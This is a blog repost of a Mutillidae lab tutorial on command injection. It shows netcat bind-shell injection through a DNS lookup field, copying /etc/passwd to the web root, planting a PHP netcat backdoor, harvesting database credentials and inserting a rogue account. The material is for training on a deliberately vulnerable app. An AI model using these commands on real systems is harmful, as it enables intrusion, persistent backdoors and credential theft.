Chuyển đến nội dung chính

Bài Hướng Dẫn Mutillidae : Lesson 3 - Command Injection Netcat Session

{ Command Injection Netcat Session }
Section 0. Background Information
  • What Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
  • What is Command Injection?
    • Command Injection occurs when an attacker is able to run operating system commands or serverside scripts from the web application.  This vulnerability potential occurs when a web application allows you to commonly do a nslookup, whois, ping, traceroute and more from their webpage.  You can test for the vulnerability by using a technique called fuzzing, where a ";" or "|" or "||" or "&" or "&&" is append to the end of the expected input (eg., www.cnn.com) followed by a command (eg., cat /etc/passwd).
  • What is netcat?
    • Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities. Netcat is often referred to as a "Swiss-army knife for TCP/IP". Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.
  • Pre-Requisite Lab
    1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedor
      • Note: Remote database access has been turned to provide an additional vulnerability.
    2. BackTrack: Lesson 1: Installing BackTrack 5 
      • Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
  • Lab Notes
    • In this lab we will do the following:
      1. Execute netcat using the command injection/execution vulnerability.
      2. Create a netcat backdoor outside of the command injection vulnerability.
      3. Conduct PHP Reconnaissance
      4. Conduct Database Reconnaissance
      5. Add a user to the nowasp.accounts table.
  • Legal Disclaimer - không thực hành trên các mục tiêu mà bạn không có thẩm quyền
Section 1. Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player
  2. Edit Fedora Mutillidae Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click the OK Button

Section 2. Login to Fedora14 - Mutillidae
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14 - Mutillidae
      3. Play virtual machine
  2. Login to Fedora14 - Mutillidae
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

Section 3. Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal
  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>
  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes (FYI):
      • As indicated below, my IP address is 192.168.1.111.
      • Please record your IP address.

Section 4. Configure BackTrack Virtual Machine Settings
  1. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings
  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

Section 5. Play and Login to BackTrack
  1. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME
    • Instructions:
      1. Type startx

Section 6. Open Console Terminal and Retrieve IP Address
  1. On BackTrack, Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window
  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.109.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).
Section 7. Start Web Browser Session to Mutillidae
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae

Section 8. Netcat Command Execution
  1. Go to DNS Lookup
    • Instructions:
      1. OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
     
  2. Execute Netcat  
    • Notes(FYI):
      • Below we are going to append NetCat to the basic nslookup test.  :)
    • Instructions:
      1. www.cnn.com;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
        • Make a FIFO named pipe.
        • Pipes allow separate processes to communicate without having been designed explicitly to work together.
        • This will allow two processes to connect to netcat.
        • nc -l 4444, tells netcat to listen and allow connections on port 4444.
      2. Click Lookup DNS
      3. Continue to next step
        • Note: No results will be displayed to this webpage, please continue to next step.
     
  3. Verifying Results
    • Note(FYI):
      1. Notice in the upper left tab, there is a connection pin-wheel that constantly spins.
      2. Notice in the lower left corner, the status bar displays the message transferring data.
      3. Both of these messages are a good signs that netcat is running and listening for a connection.
    • Instructions:
      1. Continue to next section.

Section 9. Connecting to Netcat
  1. Connect to Netcat
    • Notes(FYI):
      • Implement the following instructions on the BackTrack VM
      • Replace 192.168.1.111 with the Fedora(Mutillidae) IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. nc 192.168.1.111 4444
        • Use BackTrack to Connect to the Mutillidae Netcat session on port 4444
      2. hostname
        • This is server hostname that hosts DVWA.
      3. whoami
        • Print the effective UserID.
        • Ie., Who am I connected as.
  2. Directory and Username Reconnaissance
    • Notes (FYI):
      • We already know that we connected as the apache user, but we also want to know what is our current working directory.
      • Also, we want to know if we have the ability to create a file within the current working directory.   
    • Instructions:
      1. pwd
        • Print the current working directory
      2. uname -a
        • Print system information (eg., Operating System & Version, Kernel, etc).
      3. cat /etc/passwd > passwd.txt
        • Create a passwd.txt file located in /var/www/html/mutillidae
      4. ls -l $PWD/passwd.txt
        • List the passwd.txt file.

Section 10. Viewing /etc/passwd
  1. Open New FireFox Tab
    • Notes (FYI):
      • Perform the following instructions on BackTrack's Firefox.
    • Instructions:
      1. Click on the Green Plus to create a new tab
  2. View /etc/passwd
    • Notes (FYI):
      • Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtained in (Section 3, Step 3).
      • It nice to be able to view the password file, but the real feat was to be able to create a file and view it on the apache webserver.  (Prepare for some black magic).
    • Instructions:
      1. Place the following link in the Address Bar.
        • http://192.168.1.111/mutillidae/passwd.txt

Section 11. Create PHP Backdoor
  1. Discover the Database Engine using the /etc/passwd file
    • Notes (FYI):
      • Perform the following instructions using your previous BackTrack Terminal Netcat session.
      • We now we can create a file on the Apache Webserver in the /var/www/html/mutillidae directory.
      • Let's create a php script that will serve as a netcat backdoor without having to execute netcat using the nslookup command execution.  
    • Instructions:
      1. echo "<?php system(\"mkfifo /tmp/pipe2;sh /tmp/pipe2 | nc -l 3333 > /tmp/pipe2\"); ?>" > nc_connect.php
      2. ls -l $PWD/nc_connect.php
      3. chmod 700 nc_connect.php
      4. ls -l $PWD/nc_connect.php
      5. cat nc_connect.php
  2. Execute nc_connect.php
    • Notes (FYI):
      • Perform the next steps in BackTrack's second Firefox tab.
      • Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtain in (Section 3, Step 3).
      • Use the second Firefox tab that you previously viewed the /etc/passwd file with to execute the nc_connect.php script.  
    • Instructions:
      1. Place the following link in the Address Bar.
        • http://192.168.1.111/mutillidae/nc_connect.php
      2. Continue to Next Step
  3. On BackTrack, Start up a "another" terminal window
    • Instructions:
      1. Click on the Terminal Window
  4. Viewing your netcat sessions
    • Notes (FYI):
      • This terminal window will be used to connect to the nc_config.php netcat session.
      • Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtain in (Section 3, Step 3).
    • Instructions:
      1. nc 192.168.1.111 3333
      2. whoami
      3. ps -eaf | egrep '(3333|4444)'

Section 10. PHP Script Interrogation
  1. List all php scripts
    • Notes (FYI):
      • Perform the next steps in the nc_config.php netcat terminal.
      • Our next step is to try to figure out if any of the php scripts located under /var/www/html/mutillidae contain a database username and password.
      • But, first, let's count all the php scripts and include files.
    • Instructions:
      1. pwd
        • This show the current working directory to be /var/www/html/mutillidae.
      2. find * -name "*.php" | wc -l
        • Count the number of php script located in the current working directory.
      3. find * -name "*.inc" | wc -l
        • Count the number of php include files located in the current working directory.
  2. List all php scripts
    • Notes (FYI):
      • Now we are going to search each include file (*.inc) for the string "password" AND the strings "db" OR "database".
    • Instructions:
      1. find * -name "*.inc" | xargs grep -i password | egrep -i '(db|database)'
        • find * -name "*.inc", find all files with the *.inc extension in the current working directory.
        • xargs, build and execute command lines from standard input
        • grep -i password, ignore case and search for the string "password".
        • egrep -i '(db|database)', ignore case and search for the strings "db" OR "database".
  3. Search php scripts for the string password
    • Notes (FYI):
      • Now we will search the 900+ php scripts for the string "password" AND the strings ("db" OR "database") AND the string "=".
      • I will use head -8 to show only the first 8 lines, but feel free to remove the "| head -8" to see all the results.
      • The name of the script that contains the database password is MySQLHandler.php.
    • Instructions:
      1. find * -name "*.php" | xargs grep -i password | egrep -i '(db|database)' | grep "=" | head -8
  4. Search MySQLHandler.php for authentication information
    • Notes (FYI):
      • Below I will search the MySQLHandler.php script for the strings (password OR username OR database) and the string "=".
      • Notice the username (root), password (samurai), and database (nowasp) is listed in the results.
    • Instructions:
      1. find * -name "MySQLHandler.php" | xargs egrep -i '(password|username|database)' | grep "=" | head -10

Section 11. Database Interrogation
  1. Basic Database Interrogation
    • Notes (FYI):
      • Perform the next steps in the nc_config.php netcat terminal.
      • The below command shows you how to execute database commands in the netcat session.
      • show databases, allows you to view all databases.
      • use nowasp; show tables, means use the nowasp database and show its's tables.
    • Instructions:
      1. echo "show databases;" | mysql -uroot -psamurai
      2. echo "use nowasp; show tables;" | mysql -uroot -psamurai
  2. Interrogate the accounts table
    • Notes (FYI):
      • The below command shows you how to view the column fields of the accounts tables.
      • In addition, you will run a basic select statement to view the contents of the accounts table.
    • Instructions:
      1. echo "use nowasp; desc accounts;" | mysql -uroot -psamurai
      2. echo "select * from nowasp.accounts;" | mysql -uroot -psamurai
  3. Create a new user in the accounts table
    • Notes (FYI):
      • The below command shows you how to create a new username using the MySQL insert command.
      • Pay attention to the last record of your select statement results.
    • Instructions:
      1. echo "insert into nowasp.accounts values (null,'hacker33','p4sSw0rd!','H4ck 4 fo0d','TRUE');" | mysql -uroot -psamurai
      2. echo "select * from nowasp.accounts;" | mysql -uroot -psamurai
Section 12. Proof of Lab
  1. Proof of Lab
    • Notes (FYI):
      • Perform the next steps in the nc_config.php netcat terminal
      • Use nc_config.php netcat session for the below directions.
    • Instructions:
      1. echo "select * from nowasp.accounts where username = 'hacker33';" | mysql -uroot -psamurai
      2. netstat -nao | egrep '(3333|4444)'
      3. date
      4. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions:
      1. Do a PrtScn
      2. Paste into a word document
      3. Upload to website www.antoanthongtin.edu.vn
Nhãn:

Bài đăng phổ biến từ blog này

Hack the Gibson VM (CTF Challenge)

It’s a boot2root challenge and it does not get over with getting root access. You have to find flag also. So let’s start. First of all download lab from https://download.vulnhub.com/gibson/gibson.ova Now open kali terminal and like always start with first step i.e. netdiscover netdiscover it shows all the hosts those are up in our network and from here we get our target ip. Target IP: 192.168.1.6 As our target is all set we are going to scan it with nmap which will show all the open ports. In this case open ports are only two i.e. 22 and 80. nmap –p- -A 192.168.1.6 As from the above result we have got 80 port open so we will open target ip in browser. It shows an accessible directory. Let’s try opening it as we cannot see anything important here. Oh no such luck with this also. It’s written the result will be found by brute force but there is no place where we can apply brute force. As we do not have any other option so let’s just go to view page source to see if we could get a...
Đọc thêm

Penetration Testing in PwnLab (CTF Challenge)

In this article we will walkthrough a root2boot penetration testing challenge i.e PwnLab. PwbLab is a vulnerbale framework, based on the concept of CTF (capture the flag), with a bit of security which is a little complicated to bypass. But it’s not impossible. So, let us learn how we can get its access. Download From Here Now to start let us, firstly, consider that we do not know the IP of the PwnLab, therefore search for the IP address before hand and for that there is a command that shows us all the IP’s present in our network, so go to the terminal of you Kali and type : netdiscover Target IP = 192.168.0.105 And to know that we start our penetration testing. So, first, we will now scan with nmap , we will apply an aggressive scan as it gives detailed information and is fast. The command is : nmap -A 192.168.0.105 We have the result of scanning and as you can see there are only three ports open and they are: 80, 111, 3306. Our target IP is 192.168.0.105 as its MAC Vendor is...
Đọc thêm

Metasploitable 2 vulnerability assessment

A vulnerability assessment is a crucial part in every penetration test and is the process of identifying and assessing vulnerabilities on a target system. In this part of the tutorial we will be assessing the vulnerabilities available on the network side of the Metasploitable 2 virtual machine. We will be assessing the web applications on the Metasploitable 2 machine in a later tutorial. In the previous Metasploit enumeration and fingerprinting tutorial we’ve learned that the Metasploitable 2 machine contains a lot of vulnerabilities. We have collected valuable information about the target system which we will be using to find known vulnerabilities both on- and offline. Exploitation of these vulnerabilities will be demonstrated in the next exploitation tutorial. In this tutorial we will be looking at a few different ways to perform vulnerability analysis. We will be manually searching for exploits, use scanning tools like Nmap with scripts and we will be...
Đọc thêm